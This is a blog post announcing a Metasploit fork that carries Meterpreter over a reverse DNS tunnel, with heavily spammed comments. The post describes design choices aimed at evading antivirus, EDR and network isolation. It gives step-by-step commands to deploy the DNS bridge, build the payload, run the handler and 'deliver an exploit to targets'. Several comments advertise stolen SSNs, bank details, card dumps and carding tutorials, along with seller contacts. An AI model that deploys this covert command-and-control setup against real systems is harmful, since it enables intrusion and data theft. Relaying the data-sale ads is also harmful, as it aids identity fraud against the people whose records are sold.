пятница, 1 декабря 2017 г.

Data exfiltration with Metasploit: meterpreter DNS tunnel


    Meterpreter is a well-known Metasploit[1] remote agent for pentester's needs. This multi-staged payload is a good, flexible and easy-to-use platform that allows pentesters to have remote control over pwnedpenetrated host[2]. Currently it supports following "network" transports:


  • Binding TCP port
  • Reverse connection over TCP/IP
  • Reverse connection over HTTP 




Last year we, at defcon-russia,  have started  a fun opensource community project regarding implementing another network transport for meterpreter: reverse DNS (tunnel). Last week we also have presented it at ZeroNights. In that blog-post I want to share results of this work, future plans and main benefits and features.


Transport design and components

   Our current "pre-release" is only supports windows platforms (both, x64/x86) and consists of following main components:



The  DNS MSF Bridge is a Python script which is used as DNS server. This is key component that is working in Internet as Name Server, parsing DNS requests and sending encapsulated data back. Normal DNS tunnel. At the same time this script binds a TCP port for MSF clients (pentesters). So pentester could use MSF and control pwned target through this DNS bridge. In other words this script is acting as a transport proxy. Currently we have not implemented "native" DNS service in Ruby, but there we reasons for that. Main reason is practical: when you do a pentest, you just put this DNS script on, let's say, EC2 instance, put NS records for main domain to that IP and then you could work with it from any place using MSF. More than this - with DNS Bridge we have implemented  multi-console and payload support. This means that two or more pentesters could work at the same time with different targets and tasks using same DNS Bridge server and domain name. Currently one DNS Bridge (domain) supports up to 26 parallel sessions (pwned hosts) 






Currently we support two types of DNS tunnels: DNSKEY RR and AAAA RR. This means that we have supported all these tunnels both in shellcodes and in metsrv agent.



And now we have whole transport over DNS, shellcode stager downloads main payload (meterpreer) over DNS and runs it from the memory. And meterpreter is also using same DNS transport. Now you do not need TCP/IP DNS tunnels with additional software, like Powershell script or Dnscat2. It is more stealth because with Dnscat/Iodine or any other TCP/IP over DNS you need to run additional process and bind local port for tunneling, which could be detected by local AV/EPP, but now, it is done in right, native, way in MSF payload itself, and it means that no sockets and tunnel processes/binaries/scripts needed anymore. Also we have now less overhead for tunneling traffic. We do not encapsulating TCP/IP headers, only payload(stage) body and TLV packets for metsrv. So it is faster.

Regarding tunnel's types:

AAAA
- is slower, but it could be used from Windows XP. And yes, you can use this tunnel even if no IPv6 is used/installed on the victim box! To make this possible, we are using only reserved IPv6 address in responses, which will be passed anyway.

DNSKEY - this can be used only on Windows 7, but it is much faster.

Upload tunnel is based on subdomain values. So we have TLV encoded with base32.

Encryption - we do not use any additional encryption right now. It means that payloads will be passed "plain-text" in DNS responses. In case of AAAA tunnel it will be fragmented by IP addresses, in case of DNSKEY it will be 16 KB slice per response (TCP will be used).

Meterpreter communication is using standard encryption with session  keys (AES+XOR).

While testing speed I got following results on different networks:

Upload
     base32          - from 1 KB/sec to 4 KB/sec
Downlink
    AAAA          - from 4 KB/sec to 16 KB/sec
    DNSKEY     - from 86 KB/sec to 660 KB/sec

Speed is really depends on many things in the env and network, but in enterprise networks it will be "fast". So DNSKEY shellcodes download Meterpreter stage for 2 seconds, I  think it is good enough for practical usage. But of course it depends from many things. Meterpreter also needs at least StdLib loaded first, and it will take some time (also few seconds) as well. Migration process also depends on download speed.

Benefits


Let's now review all features and why this transport could be used. Main profit - is accessing  hosts in "isolated" vlans/networks. I still remember doing a pentest for one company when I was performing a social engineering project, where part of it was sending e-mails with PDF exploit to employees with  'no internet' policy. How to control such hosts in case if attack was successful? Reverse DNS tunnel  is an answer! Also that was a way how we escaped from network sandboxes and etc (for example some EDR/EPP have a feature to isolate compromised host from intruder access, but with DNS tunnel, we still can save our control). All this happened because pwned box do not so any connections outside of  LAN/DMZ, only to local corporate DNS server.

Another cool feature - "socket less" control which is applicable for Windows platforms. Main thing here that our agent(meterpreter, pwned process) do not need to spawn a connection, bind port or anything like this for doing DNS resolve. This is happened because MS DNS Cache will do all work for you. In other words, let's say we are injected into notepad.exe. Notepad.exe will try to setup a DNS tunnel with us through local corporate  DNS server, but UDP/TCP connection with that corporate DNS will be done not by notepad.exe but by svchost.exe. So we got +5 to stealth.



And again, for most EDR solutions it will be not visible.

HowTo


0) git clone and install https://github.com/defcon-russia/metasploit-framework
1) Buy a domain. Shorter better. Like: msf.ws
2) get a hosting like EC2 (let's say IP will be 1.2.3.4)
3) put NS records to msf.ws to the IP of that server
4) Deploy DNS MSF Bridge to that server, run it

./dns_server.py --ipaddr 1.2.3.4 --domain msf.ws

5) Prepare a payload

./msfvenom -p windows/meterpreter/reverse_dns DOMIAN=msf.ws RHOST=1.2.3.4

6) prepare an exploit with generated payload

7) run the MSF handler

use exploit/multi/handler
set payload windows/meterpreter/reverse_dns
set DOMAIN msf.ws
set RHOST 1.2.3.4
run
8) deliver  an exploit to targets and wait... sessions will be spawned

Feature plans

Currently we are trying to get this transport into main MSF fork. This means that merge work need to be done - and it is in progress now. This activity including creating native DNS handler support (so it should work if we could use MSF as a DNS server, without Bridge) is now our main target. If you want help us, please let us know!

After (and IF) merge will be done and this work will be not just fork, but part of Metasploit, then we could start implementing more features:

  •  Payload XOR encryption for stager 
  •  Powershell/VBS stagers
  •  Adding more OS platforms supported
  •  more types of tunnels: TXT, NULL and etc

If you want to help and participate - let us know!

If you have any questions or ideas - feel free to contact us at IRC(freenode.org #Metasploit,  ask  RageLtMan), Telegram (https://t.me/DCG7812 -- warning, Russian lang is main, but we could speak English a little bit! Ask me or max3raza). Or just drop an e-mail...

Sources:

Usage Demo:





[1] https://github.com/rapid7/metasploit-framework/wiki/Meterpreter
[2] https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

32 комментария:

  1. Impressive. Looking forward to see that feature incorporated into the project soon. Thanks!

    ОтветитьУдалить
    Ответы
    1. Hi All!

      I'm selling fresh & genuine SSN Leads, with good connectivity. All data properly checked & verified.
      Headers in Leads:

      First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |

      *You can ask for sample before any deal
      *Each lead will be cost $1
      *Premium Lead will be cost $5
      *If anyone wants in bulk I will negotiate
      *Sampling is just for serious buyers

      Hope for the long term deal
      For detailed information please contact me on:

      Whatsapp > +923172721122
      email > leads.sellers1212@gmail.com
      telegram > @leadsupplier
      ICQ > 752822040

      Удалить
  2. Этот комментарий был удален автором.

    ОтветитьУдалить
  3. Спасибо Алексей за статью!
    Не подскажите где можно взять исходник heapSpray(js) скрипта, который использовался в вашем докладе?

    ОтветитьУдалить

  4. Hello,
    Usually, I never comment on blogs but your blog is so convincing that I never stop myself to say something about it. You’re doing a great job Man, Keep it up.

    ОтветитьУдалить


  5. Any Side Effect from Keto Trim 800
    Keto Trim 800 is the herbal weight reduction supplement as you spot the composition statistics it has no risky agent or the chemicals so as to supply any aspect effect for your frame. So in no manner, think that this supplement is free from all kinds of intense troubles. Get your life decrease again or start using this technique.
    Read More >>> https://www.completefoods.co/diy/recipes/what-is-the-keto-trim-800

    ОтветитьУдалить

  6. Boron: Bluoxyn
    Boron builds the testosterone stage and expands the stamina of sexual need in men.

    Benefits of Bluoxyn:
    Bluoxyn upgrades offer many advantages. A part of the fundamental is following.

    Stronger Erection:
    One of the principle issues with maturing in men is they can’t keep an erection for quite some time. Yet, this everyday recipe will help you a ton in giving a long-lasting erection.
    Read News >> http://bluoxynamazon.over-blog.com/bluoxyn

    ОтветитьУдалить

  7. CFP Championship 2020 Live stream Online CFP National Championship 2020 Live is a college football Final game, which takes place between different bowl winners. CFP Championship 2020 Live Stream In 13 January, Monday, 8.00 PM. E.T. How to watch College Football CFP Championship 2020 Live stream Online*on ESPN. Winners of Fiesta Bowl and Peach Bowl will play the 2020 NCAA Championship at Louisiana. We can know the final competitor on December 28 after the Peach Bowl And Fiesta Bowl game. Following guidelines will helpful for the fans to watch the 2020 CFP Championship Trophy.
    How To Watch CFP Championship 2020 Live stream Online

    CFP Championship 2020 Live stream Online

    National Championship 2020 Live stream Online

    CFP National Championship 2020 Live stream Online

    How To Watch CFP Championship 2020 Live stream Online

    More: https://cfpchampionship2020s.com/

    https://www.notion.so/How-To-Watch-CFP-Championship-2020-Live-stream-Online-e8674da3947c49bd9a0d7ade9e20c0f0

    https://www.mifare.net/support/forum/users/cfpchampionship2020s/

    https://bn.quora.com/profile/CFp-Championship-2020-Live-Stream-Online

    https://qiita.com/cfpchampionship2020s

    https://network.changemakers.com/profiles/107289401706426444338

    https://forums.prosportsdaily.com/member.php?634077-cfpchampionshi

    ОтветитьУдалить
  8. Debbiesmiracles with an unequivocally warm complete and sound debbiesmiracles. The debbiesmiracles pores honestly permit the oxygen to go to your debbiesmiracles in like manner the zones of this debbiesmiracles open up the blocked pores therefore offevolved to exchange. The centrality stage in our body starts to head down, the look of our face ..



    https://debbiesmiracles.com/

    https://www.completefoods.co/diy/recipes/where-to-buy-debbiesmiracles

    https://debbiesmiracles.wixsite.com/debbiesmiracles

    ОтветитьУдалить
  9. sharktankpedia provide me the nonattendance of regard earlier than my extra things. I used to be to a stunning diploma clean and couldn't manage my sustenance wishes. A touch at the same time as later, after to making use of this frustrating sharktankpedia, i vanquished this difficulty and now i can cope with my throbbing. At last, i have finished a thin and match sharktankpedia shape with excessive criticalness level. In the end, there no ..



    https://sharktankpedia.org/

    https://www.completefoods.co/diy/recipes/where-to-buy-sharktankpedia

    https://sharktankpedia2.wixsite.com/sharktankpedia

    ОтветитьУдалить
  10. Governmenthorizons the path toward impacting fats. As garcinia is the modify fixings the shrewd pharmaceutical affiliations have brought a few greater fixings to the governmenthorizons that assist the garciniacombogia in playing out its devotion less all capacity constrainments. Kingdom of governmenthorizons there may be one aspect that need to be illustrated about the usage of over the counter techniques paying little note to inside the event that they're sustenance governmenthorizonss,drug treatments for enlightening ..


    https://www.governmenthorizons.org/

    https://www.completefoods.co/diy/recipes/where-to-buy-governmenthorizons

    https://governmenthorizons.wixsite.com/governmenthorizons

    ОтветитьУдалить
  11. autobodycu The smooth and incorrect face starts to look wrinkled and dry whilst we start to get age or in light of present day situations when we crosses the age of 30. autobodycu is the new strong demolishing to creating factor in the marketplace that's made to wipe out the wrinkles and placing complexities. With the continuing with use, the awesome hot autobodycu you used to have will get restored and you'll all the extra then possibly get a face as a way to leave humans thinking about approximately your ..


    https://www.autobodycu.org/

    https://www.completefoods.co/diy/recipes/where-to-buy-autobodycu

    https://autobodycu.wixsite.com/autobodycu

    ОтветитьУдалить
  12. Surgenx Keto
    surgenX keto spewing, queasiness and stomach torment. The keto influenza is certainly genuine," enlisted dietician Scott Keatley revealed to Everyday Health. "Your body capacities truly well on starches — that is the thing that it was intended for. At the point when it changes to fat consuming, it turns out to be less effective at making vitality." The keto influenza — and the going with sugar desires – frequently drives individuals to surrender the eating routine and start scarfing down carbs, however the individuals who stick it out normally report that the side effects clear up following a couple of days or two or three weeks
    http://ketoismiracle.com/surgenx-keto

    ОтветитьУдалить
  13. ketovatru review
    We needed to be goal and keep a receptive outlook, so the arrangement was to run our own investigation here at Diet Doctor to test a portion of the cases made about the advantages of the supplements.I (Kim) examined the point and arranged and ran the test under the direction and supervision of Dr. Andreas Eenfeldt, who met up with me at all times the trial structure and execution for logical thoroughness (to the best degree conceivable) and who has altered this writeup for quality and reliability reasons.
    http://ketoismiracle.com/ketovatru-review

    ОтветитьУдалить
  14. Vixea ManPlusThis Vixea ManPlus Male Enhancement articulation causes you to provide food your couple and encourages you to makes her halcyon after sex. Vixea ManPlus – Boost Your Testosterone Naturally! Here's a preparation male improvement recipe to assist you with feeling increasingly more like a man. On the off chance that you need greater, augmented muscles then this is the astounding enhancement for you. Or on the other hand, in case you're searching for a bonus to give you your magic back in the room then you are on right place.

    ОтветитьУдалить
  15. Thank you so much for this excellent blog article. Your writing style and the way you have
    presented your content is awesome. Now I am pretty clear on this topic. aroma rice cooker instructions

    ОтветитьУдалить
  16. Hi All!

    I'm selling fresh & genuine SSN Leads, with good connectivity. All data properly checked & verified.
    Headers in Leads:

    First Name | Last Name | SSN | Dob | Address | State | City | Zip | Phone Number | Account Number | Bank Name | DL Number | Routing Number | IP Address | Reference | Email | Rental/Owner |

    *You can ask for sample before any deal
    *Each lead will be cost $1
    *Premium Lead will be cost $5
    *If anyone wants in bulk I will negotiate
    *Sampling is just for serious buyers

    Hope for the long term deal
    For detailed information please contact me on:

    Whatsapp > +923172721122
    email > leads.sellers1212@gmail.com
    telegram > @leadsupplier
    ICQ > 752822040

    ОтветитьУдалить

  17. Ultra Pure 360 Keto It’s the manner to ingesting with smoldering displace stubborn substantiate fats for the close present. Moreover, it is able to genuinely recovered be the purpose you’ve been notion the end of this sec. Along those strains, get your symptom on with Ultra Pure 360 Keto Pills today!


    READ MORE >>>>> https://www.completefoods.co/diy/recipes/ultra-pure-360-keto-reviews-price-side-effects-buy

    http://ultrapure360keto.mystrikingly.com/

    ОтветитьУдалить
  18. How will Now Advanced Keto Plus Work?
    Advanced Keto Plus enhance ketosis like results on the equal time as used on the problem of incredible compounds together with natural compounds of the angiosperms tree, coffee berry Advanced Keto Plus extract, and inexperienced tea. Combining Advanced Keto Plus collectively collectively at the detail of your keto healthy eating plan and exercising everyday is probably useful as it boosts up your metabolism and could growth energy tiers. Advanced Keto Plus offers the exceptional results at the identical time as you are following a keto diet plan because of the reality your frame is within the non-prevent u . S . A . Of ketosis. It suppresses starvation and decreases the cravings for carbs.

    Read More>>> https://www.completefoods.co/diy/recipes/advanced-keto-plus-does-its-really-works-truth-here

    http://advancedketoplus.mystrikingly.com/

    ОтветитьУдалить

  19. Increase Fat – Consuming 70% of fats is essential to Ascension Keto getting your body into ketosis and staying there. It creates greater electricity to your frame to apply.
    Cut Carbs – Limiting carbs to five% forces your body to the usage of glucose for power in fact so it can burn your more fats and use it for gasoline as an opportunity.
    Protein – The very last 25% is for protein. Just make certain now not to get too much or not sufficient of any of those or you could throw off your entire healthy eating plan.

    Read More>>> https://www.completefoods.co/diy/recipes/does-ascension-keto-workread-reviews-before-buy

    https://sites.google.com/site/ascensionketonew/

    ОтветитьУдалить

  20. How does it art work?
    The blood flows in the path of the penis chamber that impacts the stamina and strength so you able to have a more difficult erection.
    It gives you and your companion the intense Primal Grow Pro orgasms.
    This produces nitric oxide in your body that growth the drift of blood to have wonderful intercourse together together alongside thing your partner.
    The blood stays collection near the penile chambers in reality to increase that chamber and to decorate the strength and stamina on your body.

    Read More>>>http://primalgrowpropill.mystrikingly.com/

    https://www.completefoods.co/diy/recipes/what-is-primal-grow-pro-read-benefits

    ОтветитьУдалить

  21. Green tea extract Keto Fab

    It’s antioxidant that continues the undesirable fatty compounds an prolonged way from the body and permits in dropping weight speedy.

    Raspberry Ketone

    It has raspberry ketones. Raspberry ketones are beneficial in lowering weight. It successfully breaks undesirable fatty compounds.

    Read More>>> https://www.completefoods.co/diy/recipes/keto-fab-read-benefits-side-effects-before-buy

    https://sites.google.com/site/ketofab2020/

    ОтветитьУдалить
  22. Keto Boost Plus is a supplement that has been labored upon very cautiously and has been crafted in a way that it offers the benefits of 100 products and ill-effects which incorporates Keto Boost Plus you in no way introduced some problem the least bit to your frame and in a few manner it truely began out out performing on its very non-public. This product has been designed mainly to ensure that you do not face any repercussions for searching out to beautify your frame.

    Dosage of Keto Boost Pluss
    The guidelines associated with the dosage of Keto Boost Plus is easy and clean. It comes in the shape of a pill, and one bottle has sixty drugs. All you want to do is take pills in Keto Boost Plus in the end; one inside the morning and one inside the night time time in advance than going to sleep. And in case you preserve up with the dependancy and do not damage, then, you can in fact see some actual results.

    ОтветитьУдалить
  23. Best Dumps Website 588 examine guide: EMC Availability Solutions and Design Specialist Exam for Technology Architects are the maximum immoderate becoming object for you. 24 hours for patron company Maybe you are the first run thru to look for our E20-588 workout look at questions, so that you have many ..

    ОтветитьУдалить
  24. ACSM Study Materials Sports Medicine Certification braindumps questions had been installed thru the most expert ACSM experts. Our price method is being built thru more secured frameworks and equipment at the manner to help make sure that your personal statistics doesn’t get breached. And of path, our American College .

    ОтветитьУдалить
  25. AHIMA Study Materials That’s it, the following web page could be complete of exercise questions. Challenging fabric. And nice of all, a threat to hone your abilties. It’s adequate in case you experience in over your head. We all did at a few point, this subsequent step is ready pushing via that worry and on the brink of address some thing as difficult because the RHIA.

    ОтветитьУдалить
  26. Compare Cisco DNA Center-enabled devices manage with traditional campus device manage; Explain the features of REST-based totally absolutely APIs; Interpret the JSON encoded data; Identify the abilities of configuration manage mechanisms which consist of Ansible, Chef, and Puppet. Cisco CCNA and Career Opportunities Cisco CCNA is genuinely the most respectable and ..
    AHLEI Study Materials

    ОтветитьУдалить
  27. To say, there had been agencies to buy, however ALE has in large part stood nonetheless -- aside from taking a majority stake in Austrian-primarily based totally Sipwise in May 2018. This acquisition strengthens its UCaaS positioning, however I don’t assume every body could placed it withinside the..
    Alcatel Lucent

    ОтветитьУдалить
  28. Alibaba Cloud to be up to date with notable enthusiasm judged through the wide variety of articles that have been posted simply withinside the closing couple of days. Plans and pricing Alibaba Cloud gives a huge and various variety of enterprise-stage cloud-associated offerings which include elastic computing, relational ...

    ОтветитьУдалить
  29. ****Contact****
    *ICQ :748957107
    *Gmail :fullzvendor111@gmail.com
    *Telegram :@James307
    *Skype : Jamesvince$
    <><><><><><><>
    USA SSN FULLZ WITH ALL PERSONAL DATA+DL NUMBER
    -FULLZ FOR PUA & SBA
    -FULLZ FOR TAX REFUND
    $2 for each fullz/lead with DL num
    $1 for each SSN+DOB
    $5 for each with Premium info
    ID's Photos For any state (back & front)
    (Price can be negotiable if order in bulk)
    <><><><><><><><><><><>
    +High quality and connectivity
    +If you have any trust issue before any deal you may get few to test
    +Every leads are well checked and available 24 hours
    +Fully cooperate with clients
    +Any invalid info found will be replaced
    +Payment Method(BTC,USDT,ETH,LTC & PAYPAL)
    +Fullz available according to demand too i.e (format,specific state,specific zip code & specifc name etc..)
    <><><><><><><><><><>
    +US cc Fullz
    +(Dead Fullz)
    +(Email leads with Password)
    +(Dumps track 1 & 2 with pin and without pin)
    +Hacking & Carding Tutorials
    +Smtp Linux
    +Safe Sock
    +Server I.P's
    +HQ Emails with passwords
    <><><><><><><><>
    *Let's do a long term business with good profit
    *Contact for more details & deal

    ОтветитьУдалить